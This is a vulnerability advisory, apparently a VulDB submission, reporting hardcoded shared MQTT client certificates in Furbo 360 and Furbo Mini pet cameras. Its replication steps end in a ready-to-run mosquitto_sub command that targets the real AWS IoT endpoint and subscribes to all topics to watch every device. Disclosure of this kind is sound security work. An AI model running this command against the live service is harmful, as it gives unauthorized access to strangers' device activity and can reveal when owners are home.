| Title | Tomofun Furbo 360, Furbo Mini Furbo 360 (≤ FB0035_FW_036), Furbo Mini (≤ MC0020_FW_074) Hardcoded Credentials |
|---|
| Description | Furbo devices have a hardcoded MQTT client certificate which is not unique. As a result, an attacker who retrieves and decrypts the Furbo firmware can impersonate any device and connect to Furbo's MQTT infrastructure as a client. The device IDs of all users can be retrieved, and an attacker can identify what is being performed with a device at a specific point in time. This issue, when combined with account IDs being issued sequentially, could allow an attacker to identify what device is associated with a specific account, and subsequently map out the actions that are performed on it throughout the day. This information could be used to identify when an owner is home based on their device interactions.
Replication steps:
Retrieve the Furbo firmware, and decrypt it.
Decompress the firmware with binwalk.
Navigate to: /squashfs-root/furbo_img
Decompress the squash file.
Navigate into: /_furbo_service-<SVC VERSION>.sqsh.extracted/squashfs-root/config/
Run:
mosquitto_sub \
-h ach7ixmm2osx.iot.us-east-1.amazonaws.com \
-p 8883 \
--cafile root_CA.pem \
--cert furbo3.certificate.pem.crt \
--key furbo3.private.pem.key \
-t '#' \
-d
Observe that you are subscribed to the endpoint as a "Furbo device" and can observe actions from every other Furbo device in the world. |
|---|
| User | jTag Labs (UID 51246) |
|---|
| Submission | 09/24/2025 16:03 (7 months ago) |
|---|
| Moderation | 10/11/2025 20:33 (17 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 328054 [Tomofun Furbo 360/Furbo Mini MQTT Client Certificate /squashfs-root/furbo_img hard-coded credentials] |
|---|
| Points | 17 |
|---|